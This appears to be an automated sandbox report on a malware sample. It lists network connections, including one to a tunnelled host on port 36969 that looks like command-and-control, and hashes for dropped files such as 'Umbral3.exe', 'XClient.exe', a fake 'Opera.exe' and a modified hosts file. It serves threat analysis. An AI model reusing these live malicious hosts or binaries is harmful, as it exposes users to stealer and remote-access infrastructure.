US 8.8.8.8:53 smatr.net udp
US 8.8.8.8:53 cdn.adlook.me udp
US 104.22.62.227:443 ads.themoneytizer.com tcp
US 8.8.8.8:53 ads.themoneytizer.com.cdn.cloudflare.net udp
US 104.22.62.227:443 ads.themoneytizer.com.cdn.cloudflare.net tcp
NL 88.208.46.222:443 smatr.net tcp
US 8.8.8.8:53 smatr.net udp
US 8.8.8.8:53 ads.themoneytizer.com.cdn.cloudflare.net udp
US 8.8.8.8:53 smatr.net udp
RU 193.17.93.93:443 cdn.adlook.me tcp
US 8.8.8.8:53 cl-7c56f4b3.edgecdn.ru udp
US 8.8.8.8:53 yastatic.net udp
US 8.8.8.8:53 cl-7c56f4b3.edgecdn.ru udp
US 8.8.8.8:53 tag.leadplace.fr udp
US 8.8.8.8:53 onetag-sys.com udp
US 8.8.8.8:53 p.cpx.to udp
US 8.8.8.8:53 adtrack.adleadevent.com udp
RU 178.154.131.217:443 yastatic.net tcp
US 8.8.8.8:53 yastatic.net udp
RU 178.154.131.217:443 yastatic.net tcp
FR 145.239.192.166:443 tag.leadplace.fr tcp
IE 52.48.122.2:443 adtrack.adleadevent.com tcp
DE 51.38.120.206:443 onetag-sys.com tcp
IE 34.241.144.138:443 p.cpx.to tcp
US 8.8.8.8:53 yastatic.net udp
US 8.8.8.8:53 ogffa.net udp
US 8.8.8.8:53 ip-fo-ovh.infra.leadplace.fr udp
US 8.8.8.8:53 system-notify.app udp
US 8.8.8.8:53 adtrack-php-loadbalancer-vpc-1246401395.eu-west-1.elb.amazonaws.com udp
US 8.8.8.8:53 onetag-sys.com udp
NL 88.208.46.222:443 ogffa.net tcp
DE 178.63.248.56:443 system-notify.app tcp
US 8.8.8.8:53 ip-fo-ovh.infra.leadplace.fr udp
US 8.8.8.8:53 adtrack-php-loadbalancer-vpc-1246401395.eu-west-1.elb.amazonaws.com udp
US 8.8.8.8:53 onetag-sys.com udp
US 8.8.8.8:53 p.cpx.to udp
US 8.8.8.8:53 ogffa.net udp
US 8.8.8.8:53 system-notify.app udp
US 8.8.8.8:53 system-notify.app udp
US 8.8.8.8:53 p.cpx.to udp
US 8.8.8.8:53 ogffa.net udp
US 8.8.8.8:53 s.cpx.to udp
US 8.8.8.8:53 ads.adlook.me udp
US 8.8.8.8:53 217.131.154.178.in-addr.arpa udp
US 8.8.8.8:53 138.144.241.34.in-addr.arpa udp
US 8.8.8.8:53 206.120.38.51.in-addr.arpa udp
US 8.8.8.8:53 56.248.63.178.in-addr.arpa udp
US 8.8.8.8:53 s.cpx.to udp
IE 3.248.98.31:443 s.cpx.to tcp
RU 176.122.21.130:443 ads.adlook.me tcp
US 8.8.8.8:53 lb-prod.adlook.me udp
DE 178.63.248.56:443 system-notify.app tcp
US 8.8.8.8:53 s.cpx.to udp
US 8.8.8.8:53 lb-prod.adlook.me udp
US 8.8.8.8:53 uidsync.net udp
DE 157.90.33.68:443 uidsync.net tcp
US 8.8.8.8:53 uidsync.net udp
DE 157.90.33.68:443 uidsync.net tcp
US 8.8.8.8:53 uidsync.net udp
US 8.8.8.8:53 130.21.122.176.in-addr.arpa udp
NL 89.149.192.193:443 euw1.smartadserver.com tcp
US 8.8.8.8:53 euw1.smartadserver.com udp
NL 89.149.192.193:443 euw1.smartadserver.com tcp
US 8.8.8.8:53 ww1097.smartadserver.com udp
US 8.8.8.8:53 euw1.smartadserver.com udp
NL 89.149.192.193:443 ww1097.smartadserver.com tcp
NL 89.149.192.193:443 ww1097.smartadserver.com tcp
US 8.8.8.8:53 ww1097.smartadserver.com udp
US 8.8.8.8:53 itx4.smartadserver.com udp
FR 185.86.139.85:443 itx4.smartadserver.com tcp
FR 185.86.139.85:443 itx4.smartadserver.com tcp
US 8.8.8.8:53 itx4.smartadserver.com udp
US 8.8.8.8:53 85.139.86.185.in-addr.arpa udp
US 8.8.8.8:53 itx4.smartadserver.com udp
FR 185.86.139.85:443 itx4.smartadserver.com tcp
FR 185.86.139.85:443 itx4.smartadserver.com tcp
US 8.8.8.8:53 firefox.settings.services.mozilla.com udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 34.149.100.209:443 prod.remote-settings.prod.webservices.mozgcp.net tcp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
FR 185.86.139.85:443 itx4.smartadserver.com tcp
US 8.8.8.8:53 itx4.smartadserver.com udp
FR 185.86.139.85:443 itx4.smartadserver.com tcp
US 8.8.8.8:53 ww1097.smartadserver.com udp
US 8.8.8.8:53 euw2.smartadserver.com udp
FR 178.32.210.226:443 euw2.smartadserver.com tcp
FR 178.32.210.226:443 euw2.smartadserver.com tcp
US 8.8.8.8:53 euw2.smartadserver.com udp
US 8.8.8.8:53 226.210.32.178.in-addr.arpa udp
FR 178.32.210.226:443 euw2.smartadserver.com tcp
US 8.8.8.8:53 euw2.smartadserver.com udp
FR 178.32.210.226:443 euw2.smartadserver.com tcp
FR 178.32.210.226:443 euw2.smartadserver.com tcp
US 8.8.8.8:53 metrics.biddertmz.com udp
US 8.8.8.8:53 euw2.smartadserver.com udp
FR 178.32.210.226:443 euw2.smartadserver.com tcp
IE 34.248.22.168:443 metrics.biddertmz.com tcp
US 8.8.8.8:53 metrics.biddertmz.com udp
IE 34.248.22.168:443 metrics.biddertmz.com tcp
NL 52.142.223.178:80 tcp
FR 178.32.210.226:443 euw2.smartadserver.com tcp
FR 178.32.210.226:443 euw2.smartadserver.com tcp
US 8.8.8.8:53 euw2.smartadserver.com udp
US 8.8.8.8:53 aus5.mozilla.org udp
US 35.244.181.201:443 aus5.mozilla.org tcp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 159.113.53.23.in-addr.arpa udp
US 8.8.8.8:53 euw2.smartadserver.com udp
FR 178.32.210.226:443 euw2.smartadserver.com tcp
US 8.8.8.8:53 euw2.smartadserver.com udp
FR 178.32.210.226:443 euw2.smartadserver.com tcp
US 8.8.8.8:53 ww1097.smartadserver.com udp
US 8.8.8.8:53 euw2.smartadserver.com udp
FR 178.32.210.226:443 euw2.smartadserver.com tcp
FR 178.32.210.226:443 euw2.smartadserver.com tcp
US 8.8.8.8:53 euw2.smartadserver.com udp
US 8.8.8.8:53 www.youtube.com udp
GB 142.250.178.14:443 www.youtube.com tcp
GB 142.250.178.14:443 www.youtube.com tcp
US 147.185.221.19:36969 phentermine-partial.gl.at.ply.gg tcp
US 8.8.8.8:53 i.ytimg.com udp
GB 216.58.212.246:443 i.ytimg.com tcp
GB 216.58.212.246:443 i.ytimg.com tcp
US 8.8.8.8:53 rr2---sn-aigl6nek.googlevideo.com udp
US 8.8.8.8:53 14.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 246.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 203.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 watson.telemetry.microsoft.com udp
US 20.189.173.22:443 watson.telemetry.microsoft.com tcp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
GB 173.194.183.103:443 rr2---sn-aigl6nek.googlevideo.com tcp
GB 142.250.178.14:443 www.youtube.com tcp
GB 142.250.178.14:443 www.youtube.com tcp
GB 216.58.212.246:443 i.ytimg.com tcp
GB 216.58.212.246:443 i.ytimg.com tcp
US 8.8.8.8:53 22.173.189.20.in-addr.arpa udp
GB 173.194.183.103:443 rr2---sn-aigl6nek.googlevideo.com tcp
GB 173.194.183.103:443 rr2---sn-aigl6nek.googlevideo.com tcp
US 8.8.8.8:53 watson.telemetry.microsoft.com udp
US 20.42.65.92:443 watson.telemetry.microsoft.com tcp
US 8.8.8.8:53 103.183.194.173.in-addr.arpa udp
US 8.8.8.8:53 92.65.42.20.in-addr.arpa udp
FR 178.32.210.226:443 euw2.smartadserver.com tcp
US 8.8.8.8:53 euw2.smartadserver.com udp
FR 178.32.210.226:443 euw2.smartadserver.com tcp
US 8.8.8.8:53 161.19.199.152.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\Umbral3.exe

MD5 7a902c87a60986f18a6b097712299256
SHA1 2c01906a39faa9d27a41e0d3cd84e92410b9c483
SHA256 e4e4f9045dc3683a2a69b9c7625f2ff46ed241ff64b47660a039dbc9d34cb0d5
SHA512 c8b75b3f0a77d1f84167af3c431e186802ccd5271fc4a361142e0209541de37f5d584d487bf5ea4b4d921e6e3846267fdea9f65cbd71001331bfea08de5425b6

C:\Users\Admin\AppData\Local\Temp\XClient.exe

MD5 3fc932775533f1bcea180de679a902dd
SHA1 3f393d02af4653e34bf5526ec5b6f8d6e4df65e8
SHA256 09a15daeebc228706f36a7659284ef673ea72e7a71700a2f73f4f1409486dd6a
SHA512 f59d35a6fe5517a5b9a1ec9a07899eef9f48745710196f1824cc79823994d6fba7975da457ee06ec6215f56860680dc0c07412268c2b1c725c4c66611a75a764

memory/1116-11-0x0000000000400000-0x0000000000457000-memory.dmp

memory/208-9-0x000001F140360000-0x000001F1403A0000-memory.dmp

memory/3172-12-0x0000000000A70000-0x0000000000A8A000-memory.dmp

memory/208-13-0x00007FFE19730000-0x00007FFE1A11C000-memory.dmp

memory/208-15-0x000001F15A980000-0x000001F15A990000-memory.dmp

memory/3172-14-0x00007FFE19730000-0x00007FFE1A11C000-memory.dmp

memory/8-20-0x000001E3D94A0000-0x000001E3D94C2000-memory.dmp

memory/8-23-0x000001E3D97A0000-0x000001E3D9816000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ztkjz4b2.12b.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 ad5cd538ca58cb28ede39c108acb5785
SHA1 1ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256 c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512 c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b721b21f475be36eee76eb7dc3e479b8
SHA1 e4ec21b1f2ed4a3d29e55ad4350fa54c9b13e53c
SHA256 caff144bf4be3976720feb58d440318d242c86a89f0c3b0133a360391015fe4d
SHA512 fcc865cab4dcc809efb5559f7882764e30d7db05284515e150cf2b43b4ed22af2cb37139302f69fed4c31fc8bcf1aaee9ebb6dddeaa85b7426a8db15509d551b

memory/208-93-0x000001F15A930000-0x000001F15A980000-memory.dmp

memory/208-94-0x000001F140800000-0x000001F14081E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 80a23dcc667f1044e1e081a455c777da
SHA1 6055683d61528226f6a58000fbe777c62997445d
SHA256 dac58db929214a19c62846e3d9012720ab4c45c820ea70602a1da188fd79a8c7
SHA512 92eb8c7aa524baaa300065d107d0c9447b99603c7f0a96efbbbff031d40d13c22a5aa1c487990ad959e133d890315e102e4e0cd05ce30a3c5051a6e60d78d2b3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9fe9224c003a770e53652e6f20b3cb00
SHA1 eadea833e10965e9c80920dd88dc3379d3f08930
SHA256 f09be6ba327295461fe878326391f060520b1995614541d041595025bde8f567
SHA512 d24cb44fa9c360abf016af85c336d4a9d777a455a630723180d0f3d939739c4dfcbb01b0ed96086ad22e78ef693722ff86099bde6c1756537ea068caa15fa269

memory/208-158-0x000001F140820000-0x000001F14082A000-memory.dmp

memory/208-159-0x000001F142110000-0x000001F142122000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f652d2865a50f5b4933f93f3ddc7f460
SHA1 27b82b6645d9a805d0159e6bd0830c0103d48dfa
SHA256 d8f6bafa2743a24d45104fbca863ff7a720ad8f6d78afa2b2b64db5d4db1a4c9
SHA512 aeca6d100aecd52bb5cb83cc6a069083384ae5038b7c2382e1d6b00d2cc28863577b8c59b0a74da4f06d1751374be78b99b11efebdcde0409c3a83053c335c31

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0415f239c4916b04fa85336548a3bae7
SHA1 bdd7b14c107c44587be56ada7d56297684b20bfe
SHA256 339c3e290c1747b800def6c2b4525c2fe7f5b7f6594731b78900b7ee7b6ea49c
SHA512 81bbac3cc68cef28ea04730f89bbe041dfbe9352ca842978d35e55de047ff312d5b050fe0d99bc32638ecd75d7c379e0bd1b4b54aa129a960b84c5e19b42d2d8

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\datareporting\glean\pending_pings\cd7749d4-cf47-4263-8ce4-83b0e7ce39e0

MD5 f0b8d29f03f56f13b3fda5d7b67f8bda
SHA1 67dd98750ca75e061c8ccd9c40e87f806b56514e
SHA256 95b20f04c4d51c64022eb1cfdf7250290256b0887cc5e6db12f430a9bd670a40
SHA512 b275afafa0f48015f98d5c370eef221bd0032ee68bd119b8750872a2a716807a90418fe465343b92e98d19f5137152dad0ca40cc515fd6859bbaf6e1ac202ecc

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\datareporting\glean\pending_pings\627712b6-586b-4345-abc7-99654a79a41d

MD5 2c8534913fa4932478fa92943f9e9204
SHA1 23df597ba5681caced56a5041a742534f8387b5d
SHA256 3bd9aea6b02768624fb96997c8f7a2b9b92fba8ddfbace7a7fb50a969fc223e8
SHA512 1073be42d3290df1857891665fdaa2902865e95445bfb087d1761c75b45c0798cd55e12e8cd1a532057f10b80e5b0ce567ba1e6cebd72b9426bb2d4cb0c85d33

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\datareporting\glean\db\data.safe.bin

MD5 dbee690736761e6e1bccec0e877566d6
SHA1 115a034f288e83c8ced1b820a944b31eb001a92e
SHA256 cbcbedab26786c181343627bf311fceed482852b676027b8ae501ba079c5f0ba
SHA512 d68cae16339bd7a302cc11ceb289c8498e098706674771c94ae696826256f4684d5013f193d845f41308c97a546d935104552eaaa848a06c55f045d5252aca6f

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 cd2cf0db365a010ce79ffc12b4a0568f
SHA1 a1f875f314d8f34c8e030ebec50f76c348693bbd
SHA256 9d8dc8f917e0c75dc8fafd0cbeaabea7b66a65e7e78983765be49de6272ee32d
SHA512 e97ab58ab4a81e2df4406e3e1faeba74a2fa7f161e9459307706cc51a4d927a6786855fc03a208bb651aa3b260760ba896410ff4ba9b09d3dbb5b5baf6deaf70

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 308d5c551b033a754cc2e3208c54100f
SHA1 7ca76119cabdd4c132cf65215d649020f7a2aeac
SHA256 20073d392598d2911fb611b2d4373d92c8929dff95fe74191c3f524c2224cd1d
SHA512 21212cc7235b3f36e43be8ea07cd3ee752768933b963c99bf2a8ef429db6214d98b0a68373c3306c0caa84a16bddc629c80c245747a48b4134b13818d3ffa471

memory/208-434-0x00007FFE19730000-0x00007FFE1A11C000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\prefs-1.js

MD5 a99016fbd08888e266ba2797b6885879
SHA1 d99b3a4764213f4b6af41f51d93e89504e073e7d
SHA256 3b9b26ca19276cef2f34718b02ecef6971f1d09936ff821613b41830e595a6d3
SHA512 ce57ad20f303b2efc9a12da17bccdb9d398f76d6f089cb29eccbb52afbeab104e0e084945141c01050bd3d168d7690a9da611ec51a2735ef940b1e660d4ea2a4

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\sessionstore-backups\recovery.jsonlz4

MD5 80c981fec322d82615ea8f63c9f1cc91
SHA1 3194b14dec14416200516929b8055a99e3fa7c91
SHA256 9d8b590a3174fa9a6460aa3db87e4d8bd876860b3e27d3daa579c356eafe30cd
SHA512 95bc4f3a56dbf4d6ebcc1a5e9aa71890b9994d0e24c6cdf9b49921330f4535c892b67597b59f18777e941b53802b1b7eff878c7c4e3b3195775e835749e95e6d

memory/3172-475-0x00007FFE19730000-0x00007FFE1A11C000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\prefs-1.js

MD5 445af009a2dbe44cee5257386a52c706
SHA1 05fb5853bbd936f28929bee81c0d54b4d6565dc5
SHA256 2cebcc9dc274a7a4326aa4fccdde3cebf16e8cb6d80be197ba6f8a57bab16823
SHA512 732261ad709f64e166cbf36e2976602543cd204986f7e233c6a00526a91c4ef77fa91e49f583a4c7556d69810d6c9341f647b737209d13fbf691b8c16e7deb6a

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\storage\default\https+++oxy.st\idb\556220133rrae_su.sqlite

MD5 c39fb6af2326c8ba84b5e9a39fca84f5
SHA1 511ea8c7133781e3b4b8533553c1b1b639ceabe0
SHA256 a155c2e8c9a232232da472111fc4869def7d0ee99ec5b1a899d1287e1b20ea44
SHA512 2465632072e8dc8b0252f18d1dcedaef106712fc72dbf7ee5d6f0a56e07f8cc39977d8aa6a6729ca787f70e7b86012b4f9ff9ac176def36af562ed5b6baa45eb

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\sessionstore-backups\recovery.jsonlz4

MD5 636d68a2c604cd972dc0731187083d8c
SHA1 d813b0090e6ac5bff735ab05c4f04495fc97db3d
SHA256 6104ffe53ecb598143775b5a64e7162531eeba7067071ed719df07a50f52f7c9
SHA512 e1792526aba2f9e404e0708cfb3e24caee11d7e688e52c806563df7fcee0ae09cb27842d83d567da66a573971ded18fe4e4ce4b68aeaa809775573f8ad1e97ed

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\je1358xf.default-release\cache2\entries\13EFA2A0AEBD2083A85C899358878A2DC2AD7C54

MD5 30b1cf2674e21195a65c63fc846073a9
SHA1 b63d718e9eaf21c44ad9bfe85d8746b665f651af
SHA256 41ae03c583e77af5d1fb2217fa791ec92b83164f837019ae2d07a96419f5ce4c
SHA512 f371350dbb4d13314e6a633f29db61b6e6a740fd5122124a3b35e88e20662b309626e44d723809813b06122eaf6ddb0db72b4af9ec34a9edd68dc35f0efa8aea

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\je1358xf.default-release\cache2\doomed\13505

MD5 f4c0b4a421ba6872368844aed0e333ac
SHA1 d4bc696dc15cef50f6cc2dc82c845cdeb8cc2573
SHA256 0754676f5cab4b74d4672c5b256f9a0c514e191d117bc4f420719686427801ce
SHA512 8678e5ae62fdc67dd4e9664f0e5011804514c420f61affda004d7ee970d6de4590192dc93bf99e7e8d601c0a212ad788bfe7a00d559af8ee4442b94410613dab

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\je1358xf.default-release\cache2\doomed\15649

MD5 3fe4be3641a8120b341fccca8a850cba
SHA1 9b62d64c537c2dfca46f5fc483d9b56601869f80
SHA256 66fe41d003e4a0c6ef51cafaf066c866615e8d71202dbf1e1a391bbb0bbe847d
SHA512 7c2c9407e347ef39bb527e9cf5618abb30e95c29cd5efad74769cf40ab187da4833c312f9b938e37e8376239ddf144e8d804f1422b04a936bf61a963161a24ac

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\je1358xf.default-release\cache2\entries\5BCFC2FFCFCFA5D698A8C966B3DD039903C169BD

MD5 3b054d6701969cc73900eaea42af0271
SHA1 207901aa643d450fd11bdd57773ad6bc4067bda0
SHA256 5ed0d3a0616966da7e68331124348c69b8fd112d1cf3e11471dfb4b3f82ad72f
SHA512 b1ccfd9f696a65c6e1f9f482be15a75cbf9ade5c36d49119b5b25a5005153666ae8748be0fd681e5ed9f16f2913c761833987d2238f5f89818e04d8249c090fb

C:\Users\Admin\Downloads\Opera.exe

MD5 f69924b642ac4b9ef1dfacdfd43759a9
SHA1 95da50564c7cbc3749148419c68a08b0f2869ee1
SHA256 d9b248ce98a243a37d33096fc7b1cad784ee77f5920b0bd6618a6690ca426f18
SHA512 2334511265c507d16b3a323c721a392659feb405a5d9fea588146c4ef320261166312c2fcf8f494c4aa342e0b5a9d5da20576ce2d6ae1e3215ee47dcc19f5e07

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\sessionstore-backups\recovery.jsonlz4

MD5 5edefea34919cd6b95f500ef781587b8
SHA1 0b432af78021130b15e79ecae62391d76f82ccc8
SHA256 b14143bf8f2f11e588214a4b59d7f694836ee721264e67ced7eae611349b8c37
SHA512 479391c7315f8cfaf3b82a456ef20ee94f3f2529fa3256e42d963c8fc81361a410fc90d17612a2e7625144e830bbe35715ce34f147d7174cfb8c89ad44772148

memory/5744-849-0x0000000000400000-0x0000000000457000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Umbral3.exe.log

MD5 e507b75f87a5b5a1e60d02faf80d3298
SHA1 c61c6060ec21c21b421d89a616807dafdaf16687
SHA256 650929c6e999ee06fd82f34a913dea89b3b5b66af2407ecf9e066f8092ab723d
SHA512 cdb6699d00b61fedc0db9ab6f5db795bae619b6f579ec5eeb57124414b0022d8d8b0a359589f3427f09a44ed4a073c75c53902ef8fdc2b288f347179603a52c3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 79b9694ca6534f2f0777084e22534e34
SHA1 3ad48b614f80b373459fb83a5e46662a3d5e69e8
SHA256 80a3848451f133574d7e6a4185db0a5eb1d0fc984bfed1c9224171491e5ed502
SHA512 63a14a57e906298e7adef9929a071fef930e364560ec344ec923176c465f752780c3b9d168940a6d56f9cf756f135543fa10de7b63c8edb311b25b34ece7592a

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0d754b109868d8227055869f43f56244
SHA1 a1ed8be92514fa5901a00ac5302b85e9094b7bf5
SHA256 98a62117618c7239ce07948961230637ea47b3f458061bd627ab03a600f9f186
SHA512 86540ff50391a74f31e95ad439c861b642f1ccb6d4d55d51ea6245d5fed8b2fe28598279775682830f465fb0d608c2571cd2b087ff582272f9322176beb4b6bf

C:\Windows\System32\drivers\etc\hosts

MD5 577f27e6d74bd8c5b7b0371f2b1e991c
SHA1 b334ccfe13792f82b698960cceaee2e690b85528
SHA256 0ade9ef91b5283eceb17614dd47eb450a5a2a371c410232552ad80af4fbfd5f9
SHA512 944b09b6b9d7c760b0c5add40efd9a25197c22e302c3c7e6d3f4837825ae9ee73e8438fc2c93e268da791f32deb70874799b8398ebae962a9fc51c980c7a5f5c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7af0729bd49ec9d9ccd1286ababe1aff
SHA1 2e671d9d755fab8ba14bf6765bbfc20303cb363e
SHA256 53178d6e7547c4997844863803d467bda2ef0618ed0c541da38a21416c46a593
SHA512 9afc18786e3803914eef8ec22c6d4bd27470a4227a1da7f017806606ab065d9f762b19eb8a629320d1d4ec170838d4f13bde6233c02ae74451d2e2fabf031f40

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a294c94cdaa304e277fe4e4ffd16349b
SHA1 ead4bd6da3cf9f0a9aa63dd14e6cbbe4b0d0325b
SHA256 0d02609124e0ca587127ff9fa0da729ba840a24b66613bb192fca99c99b0ebdb
SHA512 09f102aa0e5696fe086a4a1301ff1b8c7d8969b3453b3f591bedc238a70de27db3e8d5e50297286679053bbde0d8f653fa20d2be6668130d16b94f7fa342b5d4

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 57c3e2af308c48166f1d52724a6a67fa
SHA1 ded0fa36d5e807b419ffed3d4c6ef2fb6fcfb47c
SHA256 67164d01aed009abc69d4cb3e8da323afcf88976fb369604e0d31354984c01f7
SHA512 0250c80200f908ea6c0b36c8ce98cfbccda16e4dd93555aea45503e303b37592d9f466d343464f7507c9c9c35a38a4b61d0617bbbe792bf1b2aed7a4253066e6

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\sessionstore-backups\recovery.jsonlz4

MD5 e32be4d732d29a4c638a64ee0319b6e2
SHA1 7167e888b3cff660d66cbb1dd33b073f92013945
SHA256 f59e5f28e3bf417c804d1480e421cb3348556d5db3a268d38d442c685a4bee20
SHA512 6115c27f8a8e5b16f2f69f8eccd040d0a333b0cade509a49195a568b19ef6e325f313d74ce108c0723db51253726b8debc7eeb472d6f158b85a9c83aec314cef

C:\Users\Admin\AppData\Local\Temp\tmpaddon

MD5 85430baed3398695717b0263807cf97c
SHA1 fffbee923cea216f50fce5d54219a188a5100f41
SHA256 a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e
SHA512 06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info

MD5 3d33cdc0b3d281e67dd52e14435dd04f
SHA1 4db88689282fd4f9e9e6ab95fcbb23df6e6485db
SHA256 f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b
SHA512 a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll

MD5 fe3355639648c417e8307c6d051e3e37
SHA1 f54602d4b4778da21bc97c7238fc66aa68c8ee34
SHA256 1ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e
SHA512 8f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\prefs-1.js

MD5 8c18dbb6b313d8da17d381abded45f19
SHA1 c1c3d2657d1fe64ca74ca01a42a4708970788f22
SHA256 8e60735cc4d1b277797b13f3d265d715bd9431464eae9f4463ac280d6c21f258
SHA512 09f8a2eef92070ebdfe7fccce71a25e84cc7b49b6fb00ca7d974ec9f64e2ec9ba23ed0794aee9412e9cb1c2e58a99142d7f5feb36e799ea51ae0e25e640b6620

C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

MD5 a01c5ecd6108350ae23d2cddf0e77c17
SHA1 c6ac28a2cd979f1f9a75d56271821d5ff665e2b6
SHA256 345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42
SHA512 b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt

MD5 49ddb419d96dceb9069018535fb2e2fc
SHA1 62aa6fea895a8b68d468a015f6e6ab400d7a7ca6
SHA256 2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539
SHA512 48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json

MD5 8be33af717bb1b67fbd61c3f4b807e9e
SHA1 7cf17656d174d951957ff36810e874a134dd49e0
SHA256 e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd
SHA512 6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll

MD5 33bf7b0439480effb9fb212efce87b13
SHA1 cee50f2745edc6dc291887b6075ca64d716f495a
SHA256 8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e
SHA512 d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib

MD5 688bed3676d2104e7f17ae1cd2c59404
SHA1 952b2cdf783ac72fcb98338723e9afd38d47ad8e
SHA256 33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237
